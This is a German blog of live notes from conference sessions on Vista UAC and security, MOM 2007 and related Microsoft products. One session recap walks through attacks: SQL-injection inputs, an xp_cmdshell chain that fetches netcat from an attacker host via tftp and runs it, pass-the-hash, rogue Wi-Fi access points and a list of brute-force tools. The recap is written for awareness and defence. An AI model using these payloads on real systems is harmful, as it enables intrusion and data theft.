WCL312
Alex Heaton
Sr. Product Manager

Chris Corio
Program Manager

Ziel von UAC: Desktops rausrollen, ohne das der Benutzer lokaler Admin sein muß

Warum ist lokaler Admin schlecht ?

• heute laufen die meisten Benutzer als lokale Admins (ca. 80 % der Benutzer)
• Gefahr durch Viren/Malware/unlizensierte Software
• Benutzer kann alles am Rechner verstellen - schwierig zu supporten
• Standard User ist heute unter XP schwer - viele Aufgaben benötigen Adminrechte, viele Apps brauchen lokale Adminrechte

Was ist neu in Vista ?

• Benutzer kann heute als Standarduser mehr tun (Zeitzone, Power settings, Configuration secure Wireless connection, VPN Connections, Add Printer, ActiveX Control, Disk Defrag, ...) - alles soweit via GPOS nicht verboten !
• Programme die in die Registry schreiben und oder in Program Files, werden umgeleitet: File and Registry Redirection
  Die Registry und Program Files wird in das Userverzeichnis umgeleitet - ohne das der App. Developer was machen muß

Elevation Model

• Braucht ein Programm Adminrechte, meldet es sich mit einem elevator request
  Ist der Benutzer nur lokaler User - kann der Benutzer einen Adminbenutzer eingeben - per Group Policy kann ich diesen Dialog aber ausschalten, wenn mein Benutzer eh keinen Account dafür hat
  Ist der Benutzer lokaler Admin, muß er die Anfrage nur bestätigen

Application Compatibility

• die meisten Programme sind unter XP nicht dazu geschrieben, unter normalen User zu laufen
• mit dem Application Compatibility Toolkit haben wir in der Version 5.0 ein Tool, das mir hilft, Compatibility Issues zu finden
  
• Viele Programme laufen grundsätzlich unter dem normalen Benutzer, müssen aber in HKLM\Software oder %Program Files% schreiben
• Umgeleitete Orte:
•  %ProgramFiles% (\Program Files)
• %AllUsersProfile% (\ProgramData – what was \Documents and Settings\All Users)
• %SystemRoot% (\Windows)
• %SystemRoot%\System32 (\Windows\System32)
• Exceptions: 
• Files that have executable extensions (.exe, .bat, .vbs, .scr, etc)
• Prevents masking of system executables for servicing and security
• Exceptions can be added in HKLM\System\CurrentControlSet\Services\Luafv\Parameters\ExcludedExtensionsAdd
• Per-user virtual root:   %UserProfile%\AppData\Local\VirtualStore
• Note: Virtual files do not roam with Roaming Profiles
• File Virtualization ist als file system driver (luafv.sys) realisiert - dieser Treiber fängt Anfragen der App auf, schaut, ob der Benutezr Rechte hat und redirected den Zugriff - das bekommt die Applikation nicht mit !
• Apps, die für Vista geschrieben sind, sollten ein Manifest haben, das definiert, daß diese App Admin Rechte braucht, damit wird die Virtualisierung abgeschalten
• Virtualisierung ist auch für 64bit Apps automatisch abgeschalten

Solving App Spec. Issues

• some apps brauchen andere Methoden, daß sie als Standard USer laufen
• Hersteller fragen
• andere Methoden unter http://blogs.msdn.com/aaron_margosis/

Tool Standard User Analyzer

• Tool, mit dem ich prüfen kann, welche Rechte/Verzeichnisse eine App braucht. Ich starete die App mit diesem Tool und es protokolliert genau mit, wohin die App schreibt, ob sie AdminChecks macht, Com Objekte registrieren möchte usw.... Damit kann ich feststellen, warum eine App nicht unter dem Standard User Rechten läuft und mit dem Hersteller besser reden bzw. andere Lösungen finden....

Application and Driver Deployment

• Deployment benötigt in der Regel Admin Rechte...
• Vista hat 3 Technologien zum Deployment
• GPO Software Instalaltion
  damit kann ich MSIs innerhlab des UNternehmens deployen (schon alte Technologie, geht auch unter XP, ..)
  MSIs können Benutzer über GPOs assigned werden bzw. on demand installiert werden
• Active X Installation
  Eingebaut wegen großer Nachfrage der Benutzer (in Enterprises)
  ActiveX Controls sind designed um pro Maschine installiiert zu sein
  ActiveX Controls innherhalb von MSI Paketen zu verteilen ist sehr aufwendig
  
  Active X INstaller Service ist eine optiuonale Windows Componente in Ultimate, Enterprise und Business SKUs
  Muß manuell enabled werden - Control Panel, Programs, Turn WIndows Feature on or off
  Kann natürlich innerhalb eines Images aktiviert werden
  
  Policy:
  Ich definere die URL (http, https), definere, ob das AtiveX Control signiert sein muß
  Die Installation der ActiveX Controls ist überwacht
  
• Device Management Infrastrukture in Vista
  Problem: Standard User kann keine Treiber installieren
  Konfigurierbar vias GPOs
  Wenn Hardware installiert wird, sucht Vista automatisch nach publizierten Treibern und macht die Installation
  Benutzer merkt gar nicht, daß das eine zentralisierte INst. war
  
  Ich definere unternehmensweit, welche Treiber ich zulasse
  Benutzer hat die entweder lokal mit (notebooks) oder sie liegen auf einem Share
  Location ist dynamisch und updatebar
  Devicetreiber müssen zertifiziert sein

Nützliche Links:

Windows Vista: User Account Control
http://www.microsoft.com/windowsvista/uac 

BBlogs
hhttp://blogs.msdn.com/windowsvistasecurity/
hhttp://blogs.msdn.com/uac/

Download ACT 5.0 RC Now!!

http://connect.microsoft.com/site/sitehome.aspx?SiteID=81

Device Management Documentation

Step-by-Step Guide to Device Driver Signing and Staging: http://go.microsoft.com/fwlink/?linkid=69208

Step-by-Step Guide to Controlling Device Installation and Usage with Group Policy: http://go.microsoft.com/fwlink/?linkid=63416

Christian

P.S.: Diese Blogs entstehen direkt live während der Session - Daher bitte ich schon vorab, Rechtschreibfehler, Tippfehler, fehlende Formatierungen und Strukturen zu entschuldigen

Auf der Convergence Anfang November in München wurde bekannt gegeben, dass der CRM 3.0 Client für Vista und Office 2007 in nicht mehr allzu ferner Zukunft verfügbar sein soll.

Wenns denn wahr ist, soll der Client Anfang Dezember verfügbar sein (für Partner beispielsweise auf Partnersource zum Download).

Ich konnte den Client (in Deutsch) schon testen und bin mit der Stabilität sehr zufrieden. Die Installation verlief problemlos, auch vereinzelte Tests sind absolut problemlos verlaufen.

Was einige freuen wird ist, dass - wie erste Tests zeigen - das Problem der Geburtstagsreminder behoben ist mit Outlook 2007. Wenn bisher im CRM Kontakt der Geburtstag eingetragen wurde, so gabs automatisch einen Eintrag im Kalendar mittel Birthday Reminder. Leider aber hat bei jedem Sync-Vorgang (Online/Offline schalten vom Client) ein neuer Eintrag im Kalendar stattgefunden. Sowas ist natürlich sehr ärgerlich, da man irgendwann mal an einem Tag vom - z.B. - Kunden Müller 10 Einträge im Kalendar hat.

Nach ersten Tests schauts so aus, als ob das Problem der Vergangenheit angehört :)

Auch so manch andere Unschönheit wurde entfernt.

Derzeit befindet sich der Client noch in der Betatestphase.

------------------------
Christian Hrubesch

WCL313 Mike Chan, Sr. Product Manager

Security Bereiche bei Vista:

• Fundamentals
  • Vista ist das erste BS, das komplett nach dem Security Development Livecycle (SDL) entwickelt wurde:
    Regelmässiges Training der Developer
    externe Security Assesor für alle Komponenten - der externe Consultend muß vor dem Release unterschreiben, daß die von ihm getestete Komponente sicher ist....
  • Service Hardening
    Services laufen mit reduzierten Rechten
    erlaubte Actions von WIndows Services sind definiert
    Mißbrauch von BetriebssystemServices wird dadurch erschwert, weil sie Dinge, die sie normalerweise nicht tun, nicht tun dürfen
    
• Threat and Vulnerability Mitigation
  • IE7
    Social engineering protection:
    es ist wesentlich leichter, einen Benutzer dazu zu bringen, einen Link zu klicken und eine App zu installieren, als eine Schwachstelle im OS zu nutzen
    • Phishing filter und farbige Adressbar
      Dangerous Settings notification - wenn ich für eine Seite meine Settings verändern (weniger Secure) muß, damit sie funktionert, bleiben diese Settings in der Regel immer so unsecure - in IE7 weisen wir den User darauf hin, daß er unter "schlechten" Securitysettings läuft
      Active-X Component laufen nicht mehr per default, ich muß es dediziert erlauben - im UNternehmen kann ich aber via Group Policies definieren, welche Active X Komponenten laufen dürfen
      
    • Demo: Er startet ein Active X Control auf einer Webseite
      Dieses ActiveX Control installiert einen Prozess im Startup-Folder - bei Vista macht es das im Temporäry Internet Folder, wo diese Dateien simuliert wird.
      
    • Fishing Site Erkennung: Ohising Sites haben gewisse Elemente, die sie als Phising Sitges erkennen lassen - z.b. laden sie meist Bilder von der echten Seite runter, sie fragen gewissen Keywords ab (PIn, Name, ...) und sie redirecten dich beim Submit Button zu irgendeiner Seite... (usw...) - das erkennt der Phising Filter und warnt mich...
      
    • Protected Mode:
      Der IE Prozess läuft unter einem niederen Level als der Benutzer - dieser Prozess darf nur auf Port 80 und 443 reden und auf meine temporären Bereiche auf der Festplatte schreiben
      Alles andere geht über einen eigenen Prozess - d.h. selbst wenn ich den IE übernehmen kann, muß ich über diesen Prozess drüber
      
  • Windows Defender
    IE7 hat viele Möglichkeiten zu verhindern, daß Malware auf meinen Rechner kommt
    Defender ist quasi die letzte Barriere, die - sollte ich doch als Benutzer was runterladen und installeren - verhindert, daß böse Software meinem Rechner schadet
    
  • Forefront Client Security
    Malware Protection for Business Desktops, laptops and server operating systems that is easier to manage and control
    
  • WIndows Vista Firewall
    Die Firewall fragt mich bei jedem neuen Netzwerk 1 x , welche Art von Netzwerk es ist - Work, Home, Public
    Je nach Art werden die Firewallsettings (per GPOs) gesetzt
    Firewall hat Inbound und Outbound Regeln
    
  • IPSEC in Firewall
    
  • Network Access Protection
    Wenn ein Client versucht, sich mit meinem Netzwerk zu verbinden (egal ob über VPN, WLAn oder LAN) verbindet er sich zuerst mit dem Policy Server (in Longhorn) und dieser überprüft, ob der CLient secure ist (Patches, Virus, Firewall,..) Standardprofile verbindet sich zum Securitycenter und erkennt das, was das Security Center erkennt. 3th party Herstelller können sich hier sehr einfach reinhängen
    Ist der Client nicht "compliant", kommt er in ein restricted Netzwerk und dort kann ich einfach Patches updaten, AV Engines installeren, usw...
    Bin ich gültig, komme ich ins Netz
    Gilt nicht nur unbedingt nur beim Verbindungsaufbau, sondern auch während des Betriebs - wenn er z.b. die Firewall ausschaltet, wird das Health-Certificat gelöscht und keine Maschine spricht mehr mit mir.....
    
  • Data Execution Prevention
    Address Space Layout Randomization
    Die meisten Angriffe erfolgen über Buffer overflow - mit Vista wird das wesentlich schwerer gemacht, Buffer Overflow zu ermöglichen.
    Data execution prevention verbietet die ausführung im Datenspeicher - standardmöässig nur für WIndows Programme - um sicherer zu sein, sollte man das - nach Tests - für alle Prorgramme einschalten.
    WIndows hat bis jetzt die Windowscomponenten immer an die gleichen Stellen im Memory geladen - in Vista wird dieses zufällig gemacht, damit wird es schwerer, diese Dinge auszunutzen
    
  • Verbessertes Auditing und Control
    granulareres logging
    benutzerdefinierte Filter
    Eventlog basiert nun auf XML - wesentlich einfacher in Management Tools zu übernehmen
    Ich kann nun Events mit Tasks verbinden - z.b. Wenn Firewall abgeschalten wird, bekomme ich eine Mail....
  • Smart Cards Plug and Play
    Drivers and Certificate Service Provider (CSP) integriert in Vista
    Neue Logon Architektur - GINA (das alte WIn Logon Model) gibt es nicht mehr - Gina hat Modifikationen direkt am Kernel gemacht, was oft zu Crahses geführt hat
    Nun gibt es eine definierte Schnittstelle, die 3th Party nutzen können um biometrische Zugänge, 1Time Passworts usw. machen können - wesentlich einfacher als früher
    
• Identiy and Access Control
  • Group Policies
    Controlle ob oder nicht Device Treiber installiert werden können
    Kontrolle, welche Arten von Geräten erlaubt sind
    Kontrolle, welches Gerät erlaubt ist
  • Lokaler Admin User (User Account Control)
    Problem ist, daß es heute fast immer notwendig ist, dem User lokale Adminrechte zu geben, weil z.b. viele 3th Party Programme in Program Files schreiben - was nur Admins dürfen. Vista erkennt, daß ein Programm in Program Files schrieben will und leitet das in ein lokales Program Files unter den Benutzerprofile um.
    Weiter wurde bei der Entwicklung von Vista sehr genau geschaut, welche Aktionen heute (unter XP) Adminrechte brauchen und welche davon wirklich gefährlich sind - in Vista sind viele DInge nun ohne Adminrechte möglich (Druckerinstallation, Zeitzone verstellen, Powersettings...)
    
• Information Protection
  • Bitlocker
    Braucht eine 1,5 GB Boot Partition die nicht verschlüsselt wird - um das grundsätzlcihe BS zu starten, der Rest der Platte wird mit 256 Bit verschlüsselt
    Bitlocker kann "on the fly " enabled werden, weil es die Daten blockweise veraschlüsselt - ich kann also während meine HD verschlüsselt wird, weiterarbeiten
    Arten des Schutzes
    • TPM only - What it is
    • Dongle Onyl (USB Stick) - what you have - Funktioneirt auch, wenn USB Devices gesperrt sind, weil die Abfrage beim Booten kommt und damit der USB key erkannt wird - wenn das System dann oben und aktiv ist, kann ich den USB Key nicht mehr verwenden
    • TPM and PIN - what you know
    • TPM and Dongle - Two what i have
      
    • Die Recoverykeys können im AD gespeichert werden - wichtig ist, hier einen Prozess aufzusetzen, wie diese Keys verwendet werden (wie kann ich sicherstelen, daß der, der mich anruft, wirklich der Benutzer ist)
      
  • Wogegen willst du dich schützen ?
    • Bitlocker hilft gegen unautorisierten physischen Zugrifff auf deine Maschine
    • EFS schützt gegen andere Benutzer/Admins auf meiner Maschine
    • IRM kontrolliert die Verwendung von Daten, die ich weitergebe

MGT301
Shawn Bice
Director of Program Management
Windows Enterprise Management Division

• Feedback der Kunden zu bisherigen MOM Versionen
  
  Customer Feedback definiert, was ins Produkt reinkommt...
  4 Bereiche kommen immer wieder:
• ich muß Applikationen END to END monitoren
  z.b.: Messaging:
  Ist mehr als ein Mailserver - inkludiert Mailserver, Storage, Directory Servers, Netzwerk, Clients
  all das zusammen macht Messaging aus - und das wollen die Kunden auf einen Blick sehen, ob es funktioniert, wenn nicht - warum nicht
• Besseres Wissen für die Admins
  In den Knowledge Artikel integrierte Hilfen
• MOM muß einfacher zu deployen und verwenden sein
• genauere Definition, was Operator dürfen und nicht - z.b. ein Exchange Admin soll nur Exchange Events sehen und nur defineirte Aktionen machen können

3 grosse Bereiche der Verbesserungen:

•  Increased Efficiency and control
• nur noch 1 Konsole mit rollenbasierender Sicherheit
• wesentlich tiefere Integration  mit AD -
  Rollen in MOM sind eng verbunden mit AD Gruppen
  Agent Deployment über AD
• Self tuning treshholds
  Regeln passen sich an das Unternehemn an - lernen die Grenzen des Unternehmens kenne, in welchem Bereich Grenzen normal sind
• Leichter zu Benutzen, Reports besser und leichter anzupassen
• Integrierte Suche
  
• Demo:
  Konsole -
• Monitoring Mode
  Computer State hat sich grundsätzlich nicht geändert - ich sehe aber nur noch die Aufgaben, die zu diesem Computer Object zugeordnet sind
  Suche ist voll integriert, d.h. wenn ich events zu einer z.b. best. Datenbank hat, gebe ich den Namen oben in die Suche und seh nur noch Events zu dieser Datenbank
  Innerhalb der Knowledgebase habe ich TAsks, die mir helfen, das Problem zu lösen - ich muß als Admin nicth mehr auf den Server und die Schritte machen, sondern ich habe Scripts, die mir dabei helfen
• Authoring Mode - damit verteile ich Agents, Templates, Groups, ...
• Reporting
  ist nun ad hoc drinnen - ich kan sofort Berichte fahren
  Reports fahren über Reporting Services - gehen sehr detailliert hinein
• Administration
  Ich habe nun Rollen - Operator Role, Read Only Operator, Author, Advanced Operator - z.b. SQL Role - hier kann ich AD Gruppen hinzufügen, kann dann defineiren, welche Views diese Gruppe sieht, kann genau definieren, welche Tasks die Gruppe darf, (z.b. Offline setzen dürfen die nicht, nur online setzen)
• My Workspace - hier kann ich meine bevorzugten Ansichten usw. definieren
  
• WebConsole
  Wir haben jetzt eine Webkonsole - die beinhaltet nur die Views, auf die der User rechte hat (z.b. die vorher genierierte SQL Gruppe) und nur die Tasks
  Webconsole ist der echten Konsole vom Look&Feel sehr ähnlich
  
  
• Best of Breed for Windows
• über 50 MS Apps, Servers, Clients - Management Packs aus den Produktgruppen, MS It, Kundenfeedback, ....
• Model Based Management Packs - weg von den Alert based Monitoring - mehr in Richtung Was gehört alles zu einer Apps
• Client management ist integriert - war ein grosser Wunsch !
  d.h. Error Reporting soll nicht nur zu MS gehen, sondern zu mir auch - wenn User Probleme hat, bekomme ich die normalerweise nicht mit - mit MOM 2007 schon
  Ich kann jetzt App Crashes agentless zu meinem MOM reporten lassen  - ohne das der USer was machen muß - damit sehe ich, welche Apps bei mir häufig crashen...
• Neue Managementpacks für den Client: Vista, XP, Office Suite
• Audit collection Service - geht auf Server und Clients - löst die Frage: Wie kontroliere ich Admins ? Mit dem Audit Colelction Service sichert alle Security Eventlogs in Echtzeit - d.h. wenn ein Admin nächstens böse Dinge macht und dann die Eventlogs löscht, hat MOM die Daten !
• 3th Party INtegration für die Integration in andere Systeme
  
• Knowledge Driven:
• Knowledge ist in Dokumentationen, White Boardss, Napkins (?), und Menschen
• Durch Models kann ich das Wissen so speichern, daß es strukturiert ist und von Software genutzt werdne kann
• Wird nativ definert und in XML gespeichert
• Models basieren auf Service Model Language (SML) Schema
• Weit verbreitete Spezifikation: Microsoft, BEA, BMC, Cisco, Dell, EMC, HP, IBM, Intel, Sun
• Demo:
  Die wenigsten User rufen den Helpdesk an, wenn ihnen eine App crashed....
  Mit MOM 2007 landen die Infos, daß eine App gecrashed ist, direkt bei mir
  Ich sehe auch, wer crashed -
  Im MOM sehe ich jeden einzelne Crash, sehe Infos zu dem Crahs , wer ist der User, welche App
  Ich habe einen APp view, wo ich die Infos nach App sehe
  Ziel: Ich kann meine Arbeit priorisieren - was sind meine Top 10 Apps, die crashen, um die kümmere ich mich zuerst
  Ergebnis: Zielgerichtete Verwendung der Zeit des Admins
  Das ganze passiert Agnedless
  Auf kritischen Maschinen (PCs von Börsenhändlern, ....) kann ich einen Agend installieren, der meine Maschine monitored wie meine Server - komplett....
  Eingebaute Audit Reports: z.b. Password Change Attemps by non owners (hat der Amdin ein UserPW geändert ?)
  Dieser Venet geht SOFORT in das Audit collection System, d.h. der Admin hat keine chance, diese Daten zu löschen....
• Beispiel IIS Monitoring: Ich kann Websites monitoren - nicht nur den IIS sondern eben die ganze Webseite - ich sehe dort nciht nur geht oder nicht, sondern auch die Performance, Avaiability, Configuration,...
• Authoring:
  Ich sehe nicht alles, sondern nur das meinem Scope ntsprechend - z-.b. wähle ich IIS aus und sehe nur die Managementpacks, Monitors die zu IIS gehören - damit kann ich sehr schnell und einfach Monitors bauen...
  In 2005 hatte ich bei den Views nur die Möglichkeit die Alerts zu definieren und diese haben die Aktionen/Benachrichtigungen definiert
  In 2007 definiere ich die Aktionen/Alerts bei den Views und nicht bei den Alerts !
  In 2007 habe ich Diagostic and Repair Aufgaben - damit gehe ich in Richtung eines dynamsichen, selbstheilenden Systems
  z.b. Health Explorer
  
• End to End Service Management
• Proactive Monitoring von IT Services
• End User Sichtg
• Services orientierte Ansichten, Dashboards, Reports
• EInfache Designs und Templates....
• Der Przess ein Service Orientiertes Mnitoring zu machen ist sehr sehr einfach - hier wurde viel investiert, das wirklcih leicht zu machen - es sind viel Templates drinnen - Sharepoint, MEssaging, ...
• distributed application Designer
  ziemlich cooles Tool um meine zu überwachende App zu bauen - sehr übersichtlich, Drag and Drop, Vorlagen, ....
  Es sind dort auch Validation Tools dabei, die mein Ergebnis auf plausibilität prüfen....
  Und damit habe ich aus den vielen kleinen Verfügbarkeitsanzeigen eine echte Verfügbarkeitsanzeige eines Services....
• Timeline
• RC1 Oktober 2006
• RC2 Dezember 2006
• RTM Q1/07

P.S.: Diese und alle anderen Mitschriften entstehen live während der Session - je nach "Sessiongeschwindigkeit" und Strukturiertheit der Session ist die Mitschrift mehr oder weniger strukturiert und tlw. voller Tippfehler. Jeder Eintrag wird zwar vor dem Posten noch mal quergelesen, ich möchte mich aber für Tippfehler, Rechtschreibfehler, unstrukturierten, unklaren Inhalt usw. entschuldigen

Christian

A technical insight on how hackers attack and how you defend (PRE002)
Marcus Murray Senior Security Advisor, Truesec

Wie greife ich ein Unternehmen an ?

Marcus Murray ist ein externer, schwedischer Consultend mit einer beeindruckenden Session.

Lt. einer Statistik sind 70 % der Rechner weltweit mit Maleware verseucht - nach den ersten 2 Stunden der Session ist klar warum

Wie arbeiten Trojaner ?
Meine Firewall erlaubt z.b. keine Port 80 Zugriffe von draussen nach drinnen
Allerdings sehr wohl von drinnen nach draussen - daher baut der Trojaner den Zugriff von innen nach aussen auf und über diese Connection arbeite ich remote auf der angegriffenen Maschine.

Beispiel: Trojaner Institution
Ist Open Source, frei aus dem Internet downloadbar
Jeder Virenscanner kennt ihn
Nachdem das aber Open Source ist, kann ich einfach in den Source ein paar zusätzliche Codezeilen einbauen (1=1 und so) und neu compelieren, damit ist das für Virenscanner ein neuer Virus und sie kennnen ihn nicht.
Wenn der User den Trojaner ausführt, läuft dieser unter System Rechte auf meiner Maschine und ich kann remote VOLL auf diesen Rechner zugreifen
Das über eine von Port 80 aufgebaute Verbindung von meiner Maschine zum Server des Hackers....

d.h. der Ansatz von MS, auf einer Maschine nur erlaubten Code zu erlauben, ist eine der wenigen Möglichkeiten, das grundsätzlich zu umgehen

Unter www.milw0rm.com finde ich "schöne" Security Exploits (Zero Day Exploits) und finde dort auch HTML Code, wie ich diese Security Exploits auf meinem Webserver ausnutzen kann, um Clients bei einem reinen Besuch meiner Webseite meinen Trojaner zu installeren !

Unter www.metasploit.com finde ich nette Tools, um Trojaner zu bauen

Diese Webseiten und Tools sind keine Geheimnisse, es ist kein Securityproblem, daß ich diese Tools hier poste - diese Tools sind BASIC Tools, die uralt sind
Trotzdem funktionieren sie einfach und unkompliziert.....

Vista Security:
Hier hat Vista einen grundsätzlichen Ansatz mit dem IE im protected Mode:
User arbeitet - sogar wenn er lokaler Admin ist - nur mit der Stufe z.b. 200
Wenn eine App Admin Rechte braucht, wird nachgefragt und dann läuft diese App mit z.b. Stufe 400
Der IE allerdings arbeitet im protected Mode in der Stufe 100

Das spannende ist, daß eine App keine Systeme modifizieren/angreifen kann, die in einer höheren Stufe arbeiten, d.h. selbst wenn im IE ein Exploit ist, kann der das System nicht angreifen, weil der IE mit einer tieferen Stufe arbeitet

Ad WLAN:
Nichts neues war die Aussage und Demo, daß es sehr einfach ist, WEP Keys zu hacken - mit weitverbreiten Tools (aircrack.exe) dauert das max. 5 Minuten...
WPA dauert länger zu hacken - auf einem normalen Laptop kann ich einige 100.000 WEP Keys pro Minute raten. aber nur ein paar 100 WPA Keys...
(Wobei, um ehrlich zu sein - oft reicht es, einfach nur die WLAN Verbinung aufzubauen, da sie überhaupt nicht geschützt ist ;-)  )

Client Side Attack:
Interessanter Ansatz:
Mobile User bauen unterwegs Verbindungen zu Public WLANs auf - z.b. mit der SSID t-mobile und speichern diese Verbindungen
Arbeitet der User dann im Firmen-Lan, ist seine WLAN Karte in der Regel eingeschalten und sucht automaitsch, ob es eine der gespeicherten WLANS findet.
Mit den richtigen Tools kann ich diese "Hallo WLAN, bist du da" Anfragen mitlesen, MEINEN WLAN Accesspoint auf diese SSID konfigurieren und damit verbindet sich der Client zu MEINEM Accesspoint.
Dort bekommt er eine IP Adresse und einen Standardgateway und MEINEN DNS Server - damit surft dieser Benutzer im Firmenlan über MEINE INternetconnection und ich kann den kompletten Verkehr mitlesen.
Da er MEINEN DNS Server verwendet, kann ich ihn auch ganz einfach zu "falschen" Servern (Bankserver) schicken und er hat unter www.easybank.at MEINEN Webserver und nicht den Easybank Server.....

Ausserdem ist seine Maschine angreifbar, da die eingebaute Firewall oft deaktiviert zw. offener ist, wenn der Rechner mit dem internen Lan verbunden ist....
Tools z.b.: Sombi Server, MS Tool Fiddler zum mitlesen...)

IE sicherer als Firefox:
Sagt er nicht, weil er auf einer MS Veranstaltung spricht, er hat eine interessante Erklärung:
IE ist ein bevorzugtes System von Hackern, daher sind die einfachen Exploits bereits alle gefunden (und gefixt)
Exploits in IE sind jetzt schon wesentlich schwerer zu finden. D.h. mit jedem gefundenen und gefixten Exploit wird IE sicherer.
Bei Firefox suchen wesentlich weniger Leute, d.h. dort sind noch viele nicht gefundenen - einfache - Exploits vorhanden...

Vista und Security:
Viele Exploits nutzen Buffer overflow, weil es eine "relativ" einfache Methode ist, Apps zu mißbrauchen.
In Vista wird das Memory dynamisch geladen, d.h. Buffer Overflows funktionieren nicht mehr auf jeder Maschine, weil der Buffer Overflow auf jedem Rechner, bei jeder Session auf einer anderen Adresse ist...

SQL Hack
er zeigt die Demo auf einem SQL 2000 der nicht "harded" ist
auf einem SQL 2005 , der geharded ist, wäre es weitaus schwerer
Auf Oracle ist es noch leichter

Man nehme eine beliebige App, die z.b. ein Userlogon mit Passwort hat
und gebe beim Usernamen einmal ' ein
Schluckt er das, kann ich weitermachen, z.b. mit ' OR 1=1;--
Gibt bei der Query TRUE zurück und ich bin eingeloggt.....
Oder auch Commands like:
'; EXEC MASTER..XP_CMDSHELL "dir" --
"tftp 192.168.40.1. GET nc.txt"
"tftp 192.168.40.1 get nc.cmd"
"tftp 192.168.40.1 uuencode.txt uudecode.com"
"uudecode.com nc.txt"
"nc.cmd"

Damit kann ich Scripts am Server ausführen, Tools von meinem Server auf den SQL Server laden, dort ausführen, ...
Er hatte in 1 Minute eine Commandshell auf seiner Maschine.......

Internal Hacking:

Gleicher lokaler Adminaccount an mehreren Systemen gibt das Problem, daß wenn ich eine Maschine gehackt habe, ich alle Maschinen hacken kann....

Die Firma des Cnosultens hat 2 Tools geschrieben:
1.) Ich kann mir aus der lokalen SAM die Hashes der Passwörter holen
2.) Ich kann eine Commandline mit dieser lokalen Hash erzeugen.....

d.h. er holt sich den Passworthash des loaklen Admins und verbindet sich mit diesem Hash zu einem Networkshare am anderen Rechner ohne das Passwort wirklich zu hacken....

Wenn die das können, können das andere sicher auch...

Vista Security:
Alles, was er in seiner Session erzählt hat, sind keine Geheimnisse, sondern altbekannt (also, nicht für mich, sondern  - sagen wir mal - für die Szene.)
Vieles von dem, was er uns gezeigt hat, nutzt grundsätzliche Designschwachstellen, die nicht nur in unseren Betriebssystemen, sondern in den meisten anderen auch auftreten.

In Vista wurden sehr viele Technologien eingebaut, um solche und auch unbekannte Angriffe wesentlich zu erschweren.
Viele Technologien in Vista arbeiten im Hintergrund und wir werden vieles gar nciht wirklcih bemerken - ausser daß unsere Rechner uns gehören.
Vieles allerdings gehört konfiguriert - von unseren Partnern und Kunden - und es wird noch eine grosse Aufgabe, dies dem Markt klarzumachen.
Das Hauptproblem sehe ich darin, daß in den meisten Fällen nicht auffällt, daß ein Trojaner am Rechner aktiv ist (weil die Hacker die übernommenen Rechner ja möglichst lange nutzen wollen), d.h. das Problembewußtsein fehlt sehr oft
Und damit auch die Bereitschaft dafür Geld loszulassen....
Aber gerad emit Vista haben wir erstmals die Möglichkeit, durch grundlegende Dinge die Basissicherheit meines Netzwerkes massiv zu erhöhen......

Firewall Outbound Rules in Vista: Ich kann hier auf Port/Dienst Ebene konfigurieren, wer was darf - sogar bis zu den Services hinunter (und NICHT den Serviceaccount)

Sidenotes:
In der Hackerwelt ist Kaspersky der beliebteste Virenscanner, wenn du Kaspersky besiegst, besiegst du jeden Scanner
Wie nennt er die angegriffenen Maschinen: Target, Victim, Endlooser ;-)

------------------------

Wie kann ich mein Netzwerk schützen ?

Inventory: Was habe ich für Apps, wo laufen Services, wo könnten Services laufen
Threats - wie kann ich Threads begegnen (Patch, Absicherung, ..)
Patching - Patches testen, alle Apps betrachten, nicht nur MS (3th Party Apps, Hardware, ...)
Monitoring - sind alle Patches erfolgreich installiert ?

Grundsätzlich:

Server Hardening ! - alles was nicht läuft, kann nicht gehackt werden, dazu zählen auch Tools wie ftp, tftp, ... (alles was von Hackern mißbraucht werden kann)
Wenn ein Rechner verseucht ist, sollte er neu installert werden, du weißt nie, was alles drauf läuft.......
Der Trojaner ist meist nur der Einstiegspunkt !

11 Regeln:

• Standardise and centralize and modernize your environment
• unterschieldiche Systeme schwer zu Secure managen
  alte Systeme schwer zu managen
• Segement and harden the perimeter (Layer 3 is not enogh)
• deiierte VPNs für Server, Management und Clients - damit kann ich dedizierte Firewall Rules machen
  z.b. gibt es einen Grund, daß ein CLient zu einem anderen eine Verbindung aufmacht ? Üblicherweise nicht....
  mit 802.1x kann ich je nach Logonname/Group die Person in ein best. LAn geben - damit kann ich segemntierung nach Personen machen...
  ich mache ein Management Netz, in das ich einen TS stelle z.b. und die Management truppe loggt sich am TS an (nur die dürfen) und der TS darf auf die PCs zugreifen
  Whitepaper auf downloads: isolation  - Whitepaper zur DOmainisolation....
• Segment and haqrden the network layer
• Role base and harden servers, clients, Services and Apps
• Patch everything
• Encrypt hard drives on exposed computers
• Implement strong auth on exposed services
• Delegate administration and data access according to "least privilege"
• audit and monitor criotical computers, users and services
• Educate users
• Implement understandable and accessible policies and processes

-------------------------------------

Tools:

FTP Brute
hydra.exe
Damit kann ich sehr schnell schöne Password Brute Force Attacks machen - ftp, smtp, Terminalserver, ....
Spannend ist, daß bei einer authentifizierten SMTP Brute Force Attack KEIN Account Locking passiert !

TS Brute
tsgrinder
Brute Force Attack auf Terminalserver

SQL Injector
Injector.pl
um obengenannten Hack zu automatisieren...

NetCat
nc.exe - network listener

www.insecure.org/map - nmap - ist ein Netzwerkmapper
Macht einen Scan über mein Netzwerk um zu schauen, was dort läuft

Fazit:

Sichere Netzwerke sind viel Arbeit

Christian

Bin gerade mit der Umstellung auf die finalen Bits fertig geworden.

Vista Ultimate RTM, Office Enterprise RTM

Start der Neuinstallation um 14:15
Nach 20 Minuten war Vista lauffähig, nach 2 Stunden alle Programme, die nötig sind installiert und Vista konfiguriert.

Ersteindruck:
Noch schneller als die RC2
viele Icons haben sich geändert - schaut hübsch aus

Bis jetzt (nach knappen 3 Stunden Betrieb) keine Probleme und keine Unschönheiten gefunden....

D.h. Installieren, nutzen, begeistert sein...

 Christian

Seit gestern ist Windows Defender auch in Deutsch freigegeben – allerdings in einer aktualisierten Version (Build 1593).

Jene, die Englische Software bevorzugen und ebenfalls die aktuelle Version (Build 1593) einsetzen wollen müssen die am 24.10. freigegeben Version (Build 1592) deinstallieren (Add Remove Programs) und dann die jetzt mehrsprachig verfügbare neue Version installieren.

Download in Englisch: http://www.microsoft.com/downloads/details.aspx?displaylang=en&FamilyID=435BFCE7-DA2B-4A6A-AFA4-F7F14E605A0D

Download in Deutsch: http://www.microsoft.com/downloads/details.aspx?displaylang=de&FamilyID=435BFCE7-DA2B-4A6A-AFA4-F7F14E605A0D

Martin Berka

Um auch diesen Moment festzuhalten - Windows Vista wurde heute released!!!

Alle versprochenen Timelines werden damit eingehalten und wir werden pünktlich das beste Microsoft Client Betriebssystem "ever" auf dem Markt bringen.
Ein paar kurze Anmerkungen von Jim Allchin (Microsoft Group Vice President Platforms & Services Division) dazu:

